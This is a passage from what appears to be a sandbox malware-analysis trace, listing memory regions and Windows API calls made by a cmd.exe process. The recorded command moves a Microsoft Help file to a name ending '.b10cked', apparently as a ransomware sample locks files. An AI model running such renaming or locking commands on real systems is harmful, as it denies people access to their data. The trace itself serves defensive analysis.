0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29743 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29744 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29745 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29746 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29747 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29748 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 29749 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29750 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29751 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29752 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29753 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29754 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 29755 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 29756 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 29757 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Region: id = 29977 start_va = 0x520000 end_va = 0x5dffff entry_point = 0x520000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 661 os_tid = 0xd28 [0202.174] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afac4 | out: lpSystemTimeAsFileTime=0x1afac4*(dwLowDateTime=0xad513ca0, dwHighDateTime=0x1d440a9)) [0202.175] GetCurrentProcessId () returned 0xd1c [0202.175] GetCurrentThreadId () returned 0xd28 [0202.175] GetTickCount () returned 0x39117 [0202.175] QueryPerformanceCounter (in: lpPerformanceCount=0x1afabc | out: lpPerformanceCount=0x1afabc*=25896379051) returned 1 [0202.175] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.175] __set_app_type (_Type=0x1) [0202.175] __p__fmode () returned 0x76b331f4 [0202.175] __p__commode () returned 0x76b331fc [0202.175] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.175] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.175] GetCurrentThreadId () returned 0xd28 [0202.176] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd28) returned 0x38 [0202.176] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.176] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.176] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.176] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.176] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa54 | out: phkResult=0x1afa54*=0x0) returned 0x2 [0202.176] VirtualQuery (in: lpAddress=0x1afa8b, lpBuffer=0x1afa24, dwLength=0x1c | out: lpBuffer=0x1afa24*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.176] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa24, dwLength=0x1c | out: lpBuffer=0x1afa24*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.176] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa24, dwLength=0x1c | out: lpBuffer=0x1afa24*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.176] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa24, dwLength=0x1c | out: lpBuffer=0x1afa24*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.176] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa24, dwLength=0x1c | out: lpBuffer=0x1afa24*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.176] GetConsoleOutputCP () returned 0x1b5 [0202.176] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.176] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.176] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.176] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.177] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.177] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.177] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.177] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.177] GetEnvironmentStringsW () returned 0x320198* [0202.177] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0202.177] GetEnvironmentStringsW () returned 0x320198* [0202.177] FreeEnvironmentStringsW (penv=0x320198) returned 1 [0202.177] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9c4 | out: phkResult=0x1ae9c4*=0x40) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x0, lpData=0x1ae9d0*=0xc0, lpcbData=0x1ae9c8*=0x1000) returned 0x2 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x1, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x0, lpData=0x1ae9d0*=0x1, lpcbData=0x1ae9c8*=0x1000) returned 0x2 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x0, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x40, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x40, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x0, lpData=0x1ae9d0*=0x40, lpcbData=0x1ae9c8*=0x1000) returned 0x2 [0202.178] RegCloseKey (hKey=0x40) returned 0x0 [0202.178] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9c4 | out: phkResult=0x1ae9c4*=0x40) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x0, lpData=0x1ae9d0*=0x40, lpcbData=0x1ae9c8*=0x1000) returned 0x2 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x1, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x0, lpData=0x1ae9d0*=0x1, lpcbData=0x1ae9c8*=0x1000) returned 0x2 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x0, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x9, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x4, lpData=0x1ae9d0*=0x9, lpcbData=0x1ae9c8*=0x4) returned 0x0 [0202.178] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9cc, lpData=0x1ae9d0, lpcbData=0x1ae9c8*=0x1000 | out: lpType=0x1ae9cc*=0x0, lpData=0x1ae9d0*=0x9, lpcbData=0x1ae9c8*=0x1000) returned 0x2 [0202.178] RegCloseKey (hKey=0x40) returned 0x0 [0202.178] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.178] srand (_Seed=0x5b8863a4) [0202.178] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked\"" [0202.178] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked\"" [0202.178] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.179] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.179] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.179] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.179] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.179] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.179] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.179] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.179] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.179] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.179] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.179] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.179] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.179] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.179] GetEnvironmentStringsW () returned 0x3222e8* [0202.179] FreeEnvironmentStringsW (penv=0x3222e8) returned 1 [0202.179] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.179] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.179] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.179] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.179] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.179] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.179] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.179] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.179] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.180] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.180] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af790 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.180] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af790, lpFilePart=0x1af78c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af78c*="Desktop") returned 0x18 [0202.180] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.180] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af50c | out: lpFindFileData=0x1af50c) returned 0x320028 [0202.180] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0202.180] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af50c | out: lpFindFileData=0x1af50c) returned 0x320028 [0202.180] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0202.180] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af50c | out: lpFindFileData=0x1af50c) returned 0x320028 [0202.180] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0202.180] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.181] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.181] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.181] GetEnvironmentStringsW () returned 0x322b08* [0202.181] FreeEnvironmentStringsW (penv=0x322b08) returned 1 [0202.181] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.181] GetConsoleOutputCP () returned 0x1b5 [0202.182] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.182] GetUserDefaultLCID () returned 0x409 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af8d0, cchData=128 | out: lpLCData="0") returned 2 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af8d0, cchData=128 | out: lpLCData="0") returned 2 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af8d0, cchData=128 | out: lpLCData="1") returned 2 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.182] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.183] GetConsoleTitleW (in: lpConsoleTitle=0x3108f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.183] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.183] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.183] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.183] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.184] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.184] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.184] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.184] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.184] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.184] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.184] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.187] GetConsoleTitleW (in: lpConsoleTitle=0x1af5c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.187] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.187] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.187] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.187] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.187] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.187] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.187] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.187] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.187] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.187] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.187] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.187] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.187] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.187] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.187] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.187] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.187] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.188] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.188] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.188] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.188] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.188] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.188] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.188] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.188] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.188] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.188] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.188] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.188] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.188] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.188] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.188] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.188] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.188] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.188] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.189] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.189] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.189] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af384, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af37c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af37c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.191] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.191] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.191] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.191] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.191] _wcsicmp (_String1="MSMSAC~2.HXN", _String2=".") returned 63 [0202.191] _wcsicmp (_String1="MSMSAC~2.HXN", _String2="..") returned 63 [0202.191] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsac~2.hxn")) returned 0x2022 [0202.191] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.191] SetErrorMode (uMode=0x0) returned 0x0 [0202.192] SetErrorMode (uMode=0x1) returned 0x0 [0202.192] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", nBufferLength=0x104, lpBuffer=0x1aed0c, lpFilePart=0x1aecf4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", lpFilePart=0x1aecf4*="MSMSAC~2.HXN") returned 0x27 [0202.192] SetErrorMode (uMode=0x0) returned 0x1 [0202.192] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: 